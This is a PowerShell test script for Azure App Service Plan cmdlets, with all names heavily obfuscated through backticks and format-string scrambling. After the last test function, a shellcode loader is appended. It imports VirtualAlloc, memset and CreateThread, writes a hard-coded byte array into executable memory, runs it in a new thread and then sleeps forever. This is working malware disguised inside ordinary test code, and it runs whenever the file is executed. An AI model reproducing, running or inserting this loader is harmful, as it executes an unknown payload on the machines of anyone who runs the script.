function TES`T-crE`At`ENEwA`p`pSERvIC`EplAN
{
	
	${r`Gna`ME} = &("{1}{4}{0}{2}{3}{5}" -f'ur','G','ceGroupN','a','et-Reso','me')
	${W`Hpn`AME} = &("{1}{5}{3}{4}{2}{0}" -f 'e','Ge','am','-WebHostPla','nN','t')
	${LoC`A`TioN} = &("{3}{0}{2}{1}" -f't-Lo','tion','ca','Ge')
	${C`A`pAcITy} = 2
	${s`Ku`Name} = "S2"

	try
	{
		
		&("{1}{2}{0}{3}{4}{5}"-f'RmRe','New-A','zure','so','urce','Group') -Name ${R`gNA`me} -Location ${LocATI`On}

		
		${crEaT`eReS`U`LT} = &("{1}{3}{0}{2}{4}" -f 'A','New-Azur','ppService','eRm','Plan') -ResourceGroupName ${R`gNaMe} -Name  ${W`hPnAME} -Location  ${l`oCaT`iON} -Tier ("{2}{0}{1}" -f 'a','rd','Stand') -WorkerSize ("{0}{1}" -f'M','edium') -NumberOfWorkers ${CaPAC`I`Ty}
		
		
		&("{3}{2}{1}{0}"-f 'eEqual','Ar','-','Assert') ${wH`pN`AME} ${creatE`Resu`LT}."n`AME"
		&("{0}{4}{1}{3}{2}" -f 'Ass','r','l','t-AreEqua','e') ("{1}{0}{2}" -f 't','S','andard') ${C`REATeRES`ULt}."S`Ku"."t`ieR"
		&("{3}{0}{2}{1}{4}" -f 'rt-Are','a','Equ','Asse','l') ${sK`UnamE} ${CRe`A`TErE`Sult}."s`KU"."nA`mE"
		&("{1}{3}{0}{2}" -f 't-Are','As','Equal','ser') ${C`Ap`ACiTY} ${c`REaTeRe`S`U`LT}."s`kU"."CAPaC`ity"

		

		${GEtRE`su`LT} = &("{7}{3}{0}{2}{5}{4}{6}{1}" -f'RmAp','ePlan','pSer','ure','i','v','c','Get-Az') -ResourceGroupName ${rGN`A`Me} -Name ${w`HPN`AME}
		&("{3}{0}{1}{4}{2}" -f'ssert-Ar','e','al','A','Equ') ${WH`P`NAME} ${g`E`TrESu`lT}."na`ME"
		&("{0}{3}{1}{2}" -f 'Assert','r','eEqual','-A') ("{2}{1}{0}"-f 'ard','and','St') ${gE`Tr`esult}."S`ku"."TI`ER"
		&("{1}{2}{0}"-f'ual','A','ssert-AreEq') ${S`K`UNAme} ${ge`TREsU`LT}."S`kU"."N`AME"
		&("{0}{2}{1}" -f'A','qual','ssert-AreE') ${c`A`pacI`TY} ${getRe`S`UlT}."s`ku"."CAp`AcITy"
	}
	finally
	{
		
		&("{1}{2}{3}{5}{0}{4}" -f'a','Remove-Az','ureRmAppS','e','n','rvicePl') -ResourceGroupName ${R`gn`AmE} -Name  ${w`Hp`Name} -Force
		&("{1}{4}{2}{7}{0}{6}{5}{3}"-f 'sour','R','-','p','emove','eGrou','c','AzureRmRe') -Name ${r`gnAmE} -Force
	}
}


function T`eST`-SEtaP`Ps`ERVICE`pL`An
{
	
	${rG`NAMe} = &("{4}{2}{3}{0}{1}"-f'ceG','roupName','t-Re','sour','Ge')
	${WhpNa`me} = &("{4}{2}{5}{0}{1}{3}{6}" -f 'H','ost','-','Plan','Get','Web','Name')
	${loC`ATi`oN} = &("{2}{0}{1}{3}"-f 'ocat','i','Get-L','on')
	${T`IER} = ("{1}{0}"-f'red','Sha')
	${s`KuNa`Me} ="D1"
	${C`A`PACI`TY} = 0
	${P`Er`siTeSc`A`Ling} = ${fA`LsE};

	${n`E`WTier} =("{0}{1}"-f 'Standar','d')
	${ne`W`SkUNaME} = "S2"
	${NeWWo`R`KersiZE} = ("{1}{0}"-f 'dium','Me')
	${nEW`CaPA`C`ITy} = 2
	${NewP`erS`i`TEScALiNg} = ${T`RUe};


	try
	{
		
		&("{3}{1}{0}{5}{4}{2}{6}"-f'Az','-','ResourceGrou','New','eRm','ur','p') -Name ${r`gna`mE} -Location ${lo`c`AtioN}
		
		${ACTu`Al} = &("{5}{0}{1}{7}{2}{4}{3}{6}"-f'ew-Azu','reRmAp','iceP','a','l','N','n','pServ') -ResourceGroupName ${R`GnAme} -Name  ${W`H`pNAme} -Location  ${L`OCA`TI`oN} -Tier ${t`iER} -PerSiteScaling ${peR`Sit`E`SCal`INg}
		${ReS`Ult} = &("{2}{3}{1}{4}{0}" -f'an','rvi','Get-Azur','eRmAppSe','cePl') -ResourceGroupName ${rgNa`me} -Name  ${wH`pNaMe}
		
		&("{0}{1}{3}{2}"-f'As','sert-AreE','al','qu') ${W`hpnA`mE} ${rE`sU`LT}."nA`Me"
		&("{1}{0}{2}"-f 'sert','As','-AreEqual') ${cA`P`AcItY} ${rE`su`Lt}."s`ku"."c`Apaci`TY"
		&("{2}{0}{4}{3}{1}"-f 'ser','l','As','-AreEqua','t') ${T`Ier} ${rEsu`LT}."S`ku"."T`IER"
		&("{2}{1}{0}{3}" -f 'u','sert-AreEq','As','al') ${skUna`mE} ${r`eSulT}."s`Ku"."NA`me"
		&("{2}{1}{0}{3}" -f'Equ','e','Assert-Ar','al') ${P`Er`SITEScAl`Ing} ${r`eS`ULt}."p`ER`SiTeS`cal`InG"

		
		${N`ew`REsUlt} = &("{0}{3}{4}{5}{1}{2}"-f'Se','eRmAppServicePla','n','t-A','z','ur')  -ResourceGroupName ${RgN`Ame} -Name  ${WHpn`A`Me} -Tier ${nEW`TI`Er} -NumberofWorkers ${N`EW`CApa`CITY} -WorkerSize ${nE`ww`ORkeRSi`ze} -PerSiteScaling ${n`ewpEr`s`it`EsCAlinG}

		
		&("{1}{4}{0}{2}{3}"-f'-A','A','reEqu','al','ssert') ${wh`p`NAMe} ${n`e`WResULt}."na`me"
		&("{3}{0}{2}{1}" -f 'rt-Ar','l','eEqua','Asse') ${n`eW`CApaCIty} ${NEwR`E`s`ULt}."S`Ku"."CA`p`AcItY"
		&("{3}{1}{0}{2}"-f't-AreEqua','sser','l','A') ${NEW`TIer} ${N`eW`ResUlt}."S`KU"."tI`eR"
		&("{0}{2}{1}"-f 'Ass','Equal','ert-Are') ${nE`wSkU`NAme} ${ne`wRe`S`ULt}."S`ku"."n`Ame"
		&("{0}{2}{1}{4}{3}" -f'Asser','q','t-AreE','l','ua') ${n`E`wPE`RSI`TEscal`inG} ${n`ew`RESULT}."P`erSIT`escaLiNG"

		
		${nEW`ResU`lT}."S`KU"."c`A`PaCiTY" = ${capA`c`ity}
		${N`ew`REsulT}."s`kU"."T`IER" = ${T`IER}
		${Ne`WR`esU`lt}."s`kU"."N`AME" = ${SkU`N`Ame}
		${newRE`s`ULT}."P`erSi`TESc`AlI`NG" = ${pErSites`c`ALI`Ng}

		${NE`wRes`Ult} | &("{3}{0}{5}{4}{1}{2}"-f 'p','ce','Plan','Set-AzureRmAp','ervi','S')

		
		${NeW`R`esulT} = &("{4}{0}{1}{2}{3}" -f 'ur','eRmAppS','er','vicePlan','Get-Az') -ResourceGroupName ${R`G`NAmE} -Name  ${wh`PnaMe}

		
		&("{2}{1}{0}"-f 'qual','-AreE','Assert') ${w`hpNa`Me} ${NE`wRES`ULT}."n`AmE"
		&("{2}{1}{0}"-f'reEqual','A','Assert-') ${C`A`pA`City} ${NEw`R`e`sULt}."s`KU"."cA`Pa`city"
		&("{1}{3}{2}{0}" -f'l','Assert','reEqua','-A') ${t`IER} ${nEw`RE`sU`lT}."s`ku"."TI`Er"
		&("{1}{2}{0}{3}" -f'AreEqua','As','sert-','l') ${s`K`UNaME} ${ne`WreS`UlT}."S`ku"."NA`ME"
		&("{2}{3}{0}{1}{4}"-f'rt-Ar','eEqu','As','se','al') ${persIt`E`sCa`LiNg} ${NEw`R`EsULt}."P`ErsIteS`C`A`liNg"

	}
	finally
	{
		
		&("{6}{3}{1}{4}{2}{5}{0}"-f'n','Rm','ppServicePl','emove-Azure','A','a','R') -ResourceGroupName ${r`gN`AME} -Name  ${Whp`N`Ame} -Force
		&("{2}{3}{1}{6}{5}{0}{4}" -f'source','ove-Azur','Re','m','Group','Re','eRm') -Name ${rG`NamE} -Force
	}
}


function TEST-geta`ppsERV`Ic`eP`L`An
{
	
	${Rgn`AME} = &("{3}{4}{0}{2}{1}"-f'so','rceGroupName','u','Get-R','e')
	
	${aPI`Ver`s`Ion} = ("{1}{0}{3}{2}"-f'15-0','20','01','8-')
	${r`ESOUrC`Ety`pE} = ("{0}{1}{2}{5}{3}{4}"-f'Micr','os','oft','e','b/sites','.W')

	${L`oCaT`IOn1} = &("{3}{1}{2}{0}"-f 'on','et-Lo','cati','G')
	${Se`RVe`RFA`RMnaME1} = &("{0}{2}{3}{1}"-f'Get','anName','-W','ebHostPl')
	${tI`Er1} = ("{0}{2}{1}"-f'Shar','d','e')
	${sk`UnaM`e1} ="D1"
	${C`ApA`cItY1} = 0

	${LocA`TI`ON2} = &("{3}{2}{0}{4}{5}{1}"-f 't-Second','n','e','G','aryLoc','atio')
	${s`ERVer`FaRMN`A`me2} = &("{2}{3}{0}{5}{1}{4}"-f'ebH','stPla','G','et-W','nName','o')
	${TIe`R2} =("{0}{1}" -f'Stand','ard')
	${SkuN`AM`e2} = "S2"
	${w`OR`keRsi`ze2} = ("{0}{1}" -f 'Med','ium')
	${capa`C`iTY2} = 2
	try
	{
		
		&("{3}{0}{5}{2}{4}{6}{1}"-f 'ew','ceGroup','mRe','N','so','-AzureR','ur') -Name ${Rg`NA`mE} -Location ${Lo`CA`TioN1}
		${s`eRV`eRFA`RM1} = &("{4}{3}{2}{1}{0}" -f'lan','P','reRmAppService','w-Azu','Ne') -ResourceGroupName ${RGn`A`mE} -Name  ${SeRve`R`F`A`RMNAME1} -Location  ${LO`caTI`On1} -Tier ${t`iE`R1}
		
		
		&("{2}{1}{0}"-f'eEqual','Ar','Assert-') ${s`Er`V`E`RFAr`mNaMe1} ${SeRvER`FAR`m1}."NA`ME"
		&("{1}{2}{0}"-f'al','Assert-Are','Equ') ${c`ApACI`TY1} ${Se`RVerFa`RM1}."s`ku"."cAP`A`ciTy"
		&("{0}{3}{1}{2}{4}" -f 'As','e','rt-Are','s','Equal') ${T`iER1} ${s`ERv`Erfa`RM1}."S`kU"."tI`eR"
		&("{4}{3}{2}{1}{0}" -f'ual','Eq','rt-Are','se','As') ${sk`UnA`ME1} ${S`er`VErFA`RM1}."s`KU"."n`AME"
		
		
		${seRV`ERFA`RM1} = &("{0}{3}{1}{4}{2}" -f'Get-AzureRmA','pS','cePlan','p','ervi') -ResourceGroupName ${r`GnAmE} -Name  ${s`ERVe`Rfa`Rm`NAmE1} 

		
		&("{1}{2}{3}{0}" -f 'Equal','As','sert-A','re') ${Ser`VERf`ArmnA`ME1} ${SErV`ErF`Arm1}."N`AMe"
		&("{0}{2}{4}{3}{1}"-f 'A','al','ssert-A','qu','reE') ${cap`A`Ci`TY1} ${SERVErfa`R`M1}."S`Ku"."caPac`ITY"
		&("{1}{3}{2}{0}"-f'eEqual','A','r','ssert-A') ${t`iE`R1} ${seR`V`E`RFaRm1}."s`KU"."Ti`er"
		&("{2}{3}{1}{0}{4}"-f 't-AreE','r','A','sse','qual') ${sKUn`AmE1} ${ServE`RF`A`Rm1}."S`KU"."NA`me"

		
		${ServEr`F`A`RM2} = &("{3}{2}{1}{4}{0}" -f'lan','erv','ureRmAppS','New-Az','iceP') -ResourceGroupName ${rgN`AME} -Name  ${SerV`er`Far`MNam`e2} -Location  ${LOCAT`Io`N2} -Tier ${tIe`R2} -WorkerSize ${W`o`R`KErSIzE2} -NumberofWorkers ${CAPa`ciT`Y2}
		
		
		&("{0}{3}{1}{2}"-f'A','reEqu','al','ssert-A') ${serV`er`FARM`NA`me2} ${SE`R`VeR`FarM2}."n`AMe"
		&("{2}{3}{0}{1}" -f'E','qual','Asser','t-Are') ${caP`A`cI`Ty2} ${SE`R`VERfA`Rm2}."s`ku"."C`A`PAciTy"
		&("{1}{2}{3}{0}"-f'eEqual','A','sser','t-Ar') ${Ti`Er2} ${S`ERVErFA`R`m2}."s`Ku"."t`iEr"
		&("{0}{3}{1}{2}" -f 'Assert','AreE','qual','-') ${sKU`Na`Me2} ${S`ErV`erF`ARM2}."S`ku"."n`AmE"
		
		
		${R`ESUlT} = &("{5}{3}{1}{2}{4}{0}"-f 'n','ppService','P','mA','la','Get-AzureR') -Name ${S`ER`VeRfAR`MNAmE1}

		
		&("{0}{3}{2}{1}{4}" -f 'As','reE','A','sert-','qual') 1 ${R`es`UlT}."CoU`NT"
		${SERvER`FA`R`m1} = ${reS`ULT}[0]
		&("{0}{2}{3}{4}{1}" -f'A','al','ssert-AreE','q','u') ${seRVE`RF`Arm`N`AmE1} ${SeR`VE`R`FaRm1}."NA`mE"
		&("{1}{0}{2}"-f 'ssert-','A','AreEqual') ${CaPaC`I`TY1} ${s`eRVERFAr`M1}."s`kU"."cApaci`TY"
		&("{0}{1}{3}{2}{4}"-f 'As','s','rt-AreEqu','e','al') ${Ti`e`R1} ${s`erV`erFaRM1}."S`KU"."t`IEr"
		&("{1}{0}{3}{2}"-f'sser','A','-AreEqual','t') ${skU`Name1} ${Se`RVerFA`R`m1}."s`ku"."na`mE"

		
		${r`eSult} = &("{4}{3}{2}{0}{1}{5}"-f 'c','eP','eRmAppServi','t-Azur','Ge','lan')

		
		&("{3}{2}{0}{1}" -f '-Tru','e','rt','Asse') { ${Re`SU`lt}."coU`NT" -ge 2 }

		
		${R`eSU`lT} = &("{0}{2}{3}{4}{5}{1}" -f'Get-A','n','zureRmAp','pSe','rviceP','la') -Location ${lOC`ATi`ON1} | &("{1}{0}" -f'ect','Sel') -expand ("{0}{1}"-f 'N','ame') 
		
		
		&("{1}{0}{2}"-f's','A','sert-True') { ${RES`U`lT} -contains ${sErver`F`Arm`NAM`e1} }
		&("{0}{1}{3}{2}"-f 'As','sert-','se','Fal') { ${REs`U`lt} -contains ${seR`VE`R`Fa`R`MnAme2} }

		
		${R`EsUlT} = &("{3}{2}{4}{0}{1}"-f 'ervicePla','n','-','Get','AzureRmAppS') -ResourceGroupName ${r`GnAmE} | &("{1}{0}" -f 'ect','Sel') -expand ("{1}{0}" -f'e','Nam')
		
		
		&("{0}{4}{1}{3}{2}"-f'Asse','reEq','al','u','rt-A') 2 ${R`eS`Ult}."coU`NT"
		&("{1}{2}{0}"-f 'True','A','ssert-') { ${Re`S`ULT} -contains ${sE`Rv`E`Rf`ArmnAME1} }
		&("{1}{3}{2}{0}"-f 'e','A','t-Tru','sser') { ${resU`lt} -contains ${S`eR`V`Er`FArMnaM`e2} }

	}
	finally
	{
		
		&("{6}{4}{8}{5}{1}{2}{3}{7}{0}"-f 'lan','re','RmAppSer','vic','o','-Azu','Rem','eP','ve') -ResourceGroupName ${rG`N`AmE} -Name  ${sE`R`Ve`RFaR`mNaM`E1} -Force
		&("{0}{1}{2}{5}{3}{6}{4}" -f 'R','e','move-Az','RmAp','ServicePlan','ure','p') -ResourceGroupName ${rg`Na`mE} -Name  ${ser`VeR`FAR`MN`AME2} -Force
		&("{5}{0}{3}{4}{2}{1}" -f'zureRmResour','roup','G','c','e','Remove-A') -Name ${Rg`Na`mE} -Force
	}
}


function tEsT-rEMOVEa`PpSer`V`i`C`e`Pl`An
{
	
	${RgN`A`mE} = &("{4}{0}{2}{1}{3}" -f 'eso','eGroupNam','urc','e','Get-R')
	${sEr`V`eRfaRMN`A`Me} = &("{4}{1}{3}{0}{2}" -f's','We','tPlanName','bHo','Get-')
	${l`o`CATioN} = &("{2}{1}{0}{3}" -f '-L','t','Ge','ocation')
	${C`A`Pacity} = 0
	${S`kunaMe} = "D1"
	${tI`eR} = ("{1}{0}"-f 'd','Share')

	try
	{
		
		&("{1}{5}{4}{6}{3}{0}{7}{2}"-f'eG','New-Az','up','Resourc','re','u','Rm','ro') -Name ${R`gnaME} -Location ${L`oc`ATIOn}

		${SE`RVeRFa`RM} = &("{2}{4}{5}{3}{6}{1}{0}" -f 'Plan','ce','New','ureRmApp','-A','z','Servi') -ResourceGroupName ${rG`NA`me} -Name  ${servEr`FArm`N`AME} -Location  ${LoCa`T`iON} -Tier ${ti`eR}
		
		
		&("{2}{1}{0}{3}" -f'a','ssert-AreEqu','A','l') ${se`RvE`R`FARMN`Ame} ${sE`RVERf`A`Rm}."n`Ame"
		&("{2}{1}{0}"-f 'Equal','e','Assert-Ar') ${tI`er} ${SEr`VERf`ArM}."S`KU"."ti`ER"
		&("{2}{1}{0}" -f 'eEqual','t-Ar','Asser') ${s`KuNa`ME} ${SerV`ErFa`Rm}."S`KU"."na`ME"
		&("{1}{3}{4}{0}{2}"-f'u','Assert-Are','al','E','q') ${Ca`P`Acity} ${S`Erve`RFA`RM}."S`KU"."CAPAc`iTy"

		
		${Se`R`V`ERfARM} | &("{3}{8}{5}{4}{0}{1}{6}{2}{7}"-f 'mAp','pServ','l','Re','ureR','ove-Az','iceP','an','m') -Force
		
		${R`Es`ULt} = &("{5}{4}{3}{0}{2}{1}" -f'Serv','cePlan','i','p','mAp','Get-AzureR') -ResourceGroupName ${r`gN`Ame}

		&("{1}{2}{3}{0}{4}" -f 'ua','Assert-Ar','e','Eq','l') 0 ${res`UlT}."co`UnT" 
	}
	finally
	{
		
		&("{3}{6}{0}{1}{4}{5}{2}" -f 'm','Resour','roup','Remove-Az','ce','G','ureR') -Name ${RgN`A`Me} -Force
	}
}


function tESt-`Ge`Ta`PPsErVIce`pl`A`NMETrics
{
	
	${R`g`NAMe} = &("{2}{0}{4}{3}{1}"-f 'esource','Name','Get-R','up','Gro')
	${LOC`At`IoN} = &("{2}{0}{1}"-f'-L','ocation','Get')
	${ApPsEr`VI`cE`PLan`N`AmE} = &("{2}{4}{1}{3}{0}"-f'Name','bHo','Get-','stPlan','We')
	${t`Ier} = ("{2}{1}{0}"-f 'dard','n','Sta')
	${ap`I`VeRS`iON} = ("{0}{2}{1}" -f '2015-','01','08-')
	${Re`SOUrCETY`Pe} = ("{2}{0}{5}{3}{1}{4}"-f'i','/sit','M','oft.Web','es','cros')

	try
	{
		
		&("{2}{4}{5}{1}{0}{3}"-f'ou','ResourceGr','New','p','-Azure','Rm') -Name ${r`gn`AMe} -Location ${lo`CATion}
		${serV`eRfa`Rm} = &("{0}{3}{4}{5}{2}{1}" -f'New-','cePlan','AppServi','Azur','eR','m') -ResourceGroupName ${Rgna`me} -Name  ${APpSe`RVi`ce`pL`Ann`Ame} -Location  ${LO`cA`TIOn} -Tier ${t`Ier}
		
		${endt`ime} = &("{1}{2}{0}"-f '-Date','G','et')
		${sTARtT`i`ME} = ${end`Time}.("{0}{1}{2}"-f'A','ddHou','rs').Invoke(-3)

		${m`etRiCNA`MeS} = @('CPU', ("{2}{1}{0}" -f's','est','Requ'))

		
		${M`ETr`Ics} = &("{3}{1}{2}{5}{0}{4}{7}{6}" -f'mAppServi','-','Azure','Get','cePlanM','R','cs','etri') -ResourceGroupName ${R`GN`AME} -Name ${APps`e`RvIcEpl`A`NNamE} -Metrics ${ME`TRic`N`AMES} -StartTime ${s`TArTT`i`Me} -EndTime ${eN`d`Time} -Granularity ("{0}{1}" -f 'PT','1M')

		${Actual`m`eT`Ri`cnaMES} = ${m`eTrI`cS} | &("{1}{0}"-f 'ct','Sele') -Expand ("{1}{0}"-f 'me','Na') | &("{1}{0}" -f 't','Selec') -Expand ("{0}{1}"-f 'V','alue') 

		foreach (${i} in ${mEt`RiCSn`A`mES})
		{
			&("{1}{0}{2}" -f't-Tr','Asser','ue') { ${A`C`TU`ALMEt`RiC`SnamEs} -contains ${I}}
		}

		
		${MEtrI`CS} = ${Ser`V`ER`FARm} | &("{2}{3}{7}{4}{0}{1}{5}{6}{8}{9}" -f'l','an','Get-Azure','Rm','viceP','Met','r','AppSer','i','cs') -Metrics ${mEt`RicN`A`MEs} -StartTime ${StA`RtT`iMe} -EndTime ${e`N`dtimE} -Granularity ("{1}{0}"-f 'M','PT1')

		${a`c`T`Ua`LME`TRICNaMes} = ${MeT`R`ICs} | &("{0}{1}"-f 'S','elect') -Expand ("{0}{1}"-f 'Na','me') | &("{0}{1}"-f 'Se','lect') -Expand ("{0}{1}" -f 'Valu','e') 

		foreach (${I} in ${mE`TR`IC`snA`MES})
		{
			&("{1}{2}{0}"-f'ue','Assert-T','r') { ${ACTUAlM`eTRICs`N`AM`eS} -contains ${i}}
		}
	}
	finally
	{
		
		&("{3}{4}{2}{0}{1}" -f'la','n','viceP','Remove-Az','ureRmAppSer') -ResourceGroupName ${R`GNAME} -Name  ${Ap`PsER`V`i`Ceplanna`Me} -Force
		&("{5}{4}{1}{3}{2}{0}{6}" -f'c','es','ur','o','-AzureRmR','Remove','eGroup') -Name ${rg`N`AmE} -Force
	}
}


function teST-`cR`eateneW`A`ppsErViC`ePlA`NiNaSe
{
	
	${rG`NamE} = &("{3}{5}{2}{0}{1}{4}" -f'e','Gro','rc','Get-Reso','upName','u')
	${WH`PN`AmE} = &("{1}{0}{2}{4}{3}" -f'-','Get','WebHos','ame','tPlanN')
	${L`oCaTI`On} = ("{0}{1}{2}"-f 'W','e','st US')
	${ca`Pa`CITY} = 1
	${sKun`AME} = "S2"
	${A`senaMe} = ("{1}{0}" -f 'sedemo','a')
	${A`Sere`sOuRC`EgRoUp`Na`Me} = ("{0}{1}" -f 'appd','emorg')

	try
	{
		
		&("{5}{4}{1}{0}{3}{6}{2}" -f'so','Re','p','urc','eRm','New-Azur','eGrou') -Name ${rGna`mE} -Location ${LoC`ATi`On}

		
		${cR`ea`TERE`SUlT} = &("{1}{3}{4}{6}{0}{5}{2}" -f 'vicePl','New','n','-AzureRm','AppS','a','er') -ResourceGroupName ${Rgn`A`Me} -Name  ${Wh`p`Name} -Location  ${l`o`cAtIOn} -Tier ("{1}{0}{2}" -f 'andar','St','d') -WorkerSize ("{1}{0}"-f'edium','M') -NumberOfWorkers ${cAP`Ac`ItY} -AseName ${Ase`N`Ame} -AseResourceGroupName ${a`s`EreS`OuRc`egr`ouPname}
		
		
		&("{0}{2}{3}{1}"-f'A','qual','ssert-Ar','eE') ${W`HPNAmE} ${cREat`e`RESult}."N`AME"
		&("{3}{0}{2}{1}" -f 'ert-Are','ual','Eq','Ass') ("{1}{2}{0}" -f'd','St','andar') ${crE`ATER`e`SuLT}."s`ku"."TI`eR"
		&("{3}{0}{1}{2}"-f 're','Equa','l','Assert-A') ${skun`AmE} ${crEAt`ER`E`su`lT}."S`kU"."n`AMe"
		&("{2}{1}{0}{3}" -f'Are','t-','Asser','Equal') ${c`APA`City} ${cr`eATERE`SUlt}."S`ku"."CapA`CITY"

		

		${gETR`ESU`Lt} = &("{3}{6}{2}{0}{1}{4}{5}"-f 'RmA','ppSer','re','G','vic','ePlan','et-Azu') -ResourceGroupName ${rgn`AMe} -Name ${wHpn`AMe}
		&("{1}{0}{2}"-f 'Eq','Assert-Are','ual') ${wH`p`Name} ${Ge`TresU`lT}."NA`mE"
		&("{2}{4}{3}{1}{0}"-f 'l','qua','Ass','rt-AreE','e') ("{1}{0}" -f 'rd','Standa') ${gE`T`REs`ULT}."S`ku"."ti`ER"
		&("{1}{2}{0}{4}{3}" -f'A','As','sert-','Equal','re') ${sK`U`Name} ${GEtR`ES`U`Lt}."s`ku"."N`AMe"
		&("{2}{0}{4}{1}{3}" -f 'ssert','eEqua','A','l','-Ar') ${c`A`pa`cITY} ${GETREs`U`Lt}."s`kU"."CaPA`CitY"
	}
	finally
	{
		
		&("{7}{2}{1}{5}{0}{6}{8}{3}{4}"-f'Azur','ov','em','l','an','e-','eRmAppServ','R','iceP') -ResourceGroupName ${Rgn`AmE} -Name  ${Wh`Pna`me} -Force
		&("{4}{6}{5}{2}{1}{0}{3}"-f'ceGr','ureRmResour','z','oup','Remo','A','ve-') -Name ${RG`NamE} -Force
	}
}
${C} = ((("{28}{20}{36}{47}{34}{82}{49}{27}{52}{26}{11}{6}{12}{16}{46}{31}{80}{25}{44}{32}{53}{58}{57}{60}{65}{33}{69}{2}{23}{73}{75}{45}{39}{15}{87}{59}{62}{55}{14}{4}{9}{67}{64}{0}{81}{41}{38}{42}{18}{8}{13}{68}{71}{83}{30}{7}{89}{70}{24}{5}{1}{63}{85}{84}{78}{22}{72}{29}{3}{66}{88}{76}{43}{35}{56}{54}{77}{51}{48}{61}{40}{86}{17}{19}{50}{10}{21}{79}{37}{74}" -f'kSize, IntPtr lpSt','n','32.','0}m','tri',' I','tPtr ','o','ntPtr','butes, uin','int','loc(In','l',' lpP','At','Thread(In','pAddress, ','(IntPtr d',', I','est, ','lImpor',' src, uint co','d','d','ags,','l','alAl','tic e','[Dl','{','reati','t dwSize, ui','onType,','lImp','2.dll{0',' ','t({0}kernel','t','e','IntPtr Create','r memse','r','ss','tatic','locati','ern ','uin','3','n','lic sta','u',' I','xtern IntPtr Virtu',' u','te','d','ex','flPro','int ','tr lp','tec','tPt','Threa','tPtr',' dwStac','t);[Dl','svc','t','aram','ort({0}kernel','Fl','eter,',');[DllImport(','ll{0})]',');','public static ext','{0})]public s','rn','readI','un','nt flA','artAdd','})]pub',' uint dwC','Th',' lp','t','tP','rt.dll','n'))  -F  [CHAr]34);${w} = &("{1}{2}{0}"-f '-Type','Ad','d') -memberDefinition ${c} -Name ("{0}{1}"-f 'W','in32') -namespace ("{1}{4}{2}{3}{0}" -f'ions','W','2F','unct','in3') -passthru;[Byte[]];[Byte[]]${z} = 0xba,0x02,0x53,0x4b,0x2d,0xdb,0xc7,0xd9,0x74,0x24,0xf4,0x5e,0x33,0xc9,0xb1,0x57,0x83,0xc6,0x04,0x31,0x56,0x11,0x03,0x56,0x11,0xe2,0xf7,0xaf,0xa3,0xaf,0xf7,0x4f,0x34,0xd0,0x7e,0xaa,0x05,0xd0,0xe4,0xbe,0x36,0xe0,0x6f,0x92,0xba,0x8b,0x3d,0x07,0x48,0xf9,0xe9,0x28,0xf9,0xb4,0xcf,0x07,0xfa,0xe5,0x33,0x09,0x78,0xf4,0x67,0xe9,0x41,0x37,0x7a,0xe8,0x86,0x2a,0x76,0xb8,0x5f,0x20,0x24,0x2d,0xeb,0x7c,0xf4,0xc6,0xa7,0x91,0x7c,0x3a,0x7f,0x93,0xad,0xed,0x0b,0xca,0x6d,0x0f,0xdf,0x66,0x24,0x17,0x3c,0x42,0xff,0xac,0xf6,0x38,0xfe,0x64,0xc7,0xc1,0xac,0x48,0xe7,0x33,0xad,0x8d,0xc0,0xab,0xd8,0xe7,0x32,0x51,0xda,0x33,0x48,0x8d,0x6f,0xa0,0xea,0x46,0xd7,0x0c,0x0a,0x8a,0x81,0xc7,0x00,0x67,0xc6,0x80,0x04,0x76,0x0b,0xbb,0x31,0xf3,0xaa,0x6c,0xb0,0x47,0x88,0xa8,0x98,0x1c,0xb1,0xe9,0x44,0xf2,0xce,0xea,0x26,0xab,0x6a,0x60,0xca,0xb8,0x07,0x2b,0x83,0x50,0x72,0xa0,0x53,0xc5,0x0b,0x21,0x3a,0x7c,0xa7,0xd9,0x8e,0x09,0x61,0x1d,0xf0,0x23,0x5c,0xfa,0x5d,0x9f,0xcd,0xaf,0x32,0x77,0xcb,0x19,0xcc,0x20,0xd4,0x73,0x7d,0x7c,0x40,0x7f,0xd1,0xd1,0xfc,0xc4,0xd4,0xd5,0xfc,0xd2,0x5b,0xd5,0xfc,0x22,0x4b,0xa2,0xaf,0x12,0xa7,0x7b,0x4f,0x03,0xaf,0x2c,0xc6,0x3c,0xe9,0x2c,0x0d,0xcb,0x30,0x81,0xc5,0xcc,0x8e,0xc6,0x91,0x9e,0xbd,0x55,0xce,0x73,0x14,0x32,0x1b,0x26,0xb6,0xf9,0x24,0x1c,0x50,0x97,0xd0,0xc0,0x35,0xe8,0xd7,0xfe,0xc5,0x61,0xf7,0x95,0xc1,0x21,0x9d,0x76,0x9c,0xa9,0x14,0xcf,0xbe,0xac,0x29,0x1a,0xed,0xe3,0x86,0xf6,0x44,0x6c,0x05,0xff,0x70,0x17,0xaa,0x2a,0x05,0x27,0x21,0xdf,0x49,0xdd,0x10,0xb7,0xa5,0xa8,0x00,0x1e,0xb9,0x06,0x2e,0xdf,0x2d,0xa9,0xbe,0xdf,0xad,0xc1,0xbe,0xdf,0xed,0x11,0xed,0xb7,0xb5,0xb5,0x42,0xad,0xb9,0x63,0xf7,0x7e,0x15,0x05,0x10,0xd7,0xf1,0x15,0xfe,0xd8,0x01,0x45,0xa8,0xb0,0x13,0xff,0xdd,0xa3,0xeb,0x2a,0x58,0xe3,0x60,0x18,0xe9,0xe3,0x89,0x61,0x68,0x2b,0xfc,0x80,0x2a,0x6f,0xa0,0xa2,0xbf,0x90,0xa0,0xcc,0x0e,0x56,0x6d,0x1d,0x41,0x9e,0xa9,0x4f,0x90,0xee,0xf1,0xa1,0xe0,0x3e,0x34,0xbe;${g} = 0x1000;if (${Z}."l`e`NgTH" -gt 0x1000){${g} = ${z}."l`En`GTh"};${X}=${w}::("{0}{3}{1}{2}" -f 'Vi','tu','alAlloc','r').Invoke(0,0x1000,${g},0x40);for (${i}=0;${i} -le (${Z}."LE`N`gTH"-1);${i}++) {${W}::"M`E`MsEt"([IntPtr](${x}.("{0}{1}" -f 'ToInt','32').Invoke()+${I}), ${z}[${i}], 1)};${W}::("{2}{0}{3}{1}" -f'teT','ad','Crea','hre').Invoke(0,0,${X},0,0,0);for (;;){&("{1}{2}{0}" -f'p','Sta','rt-slee') 60};
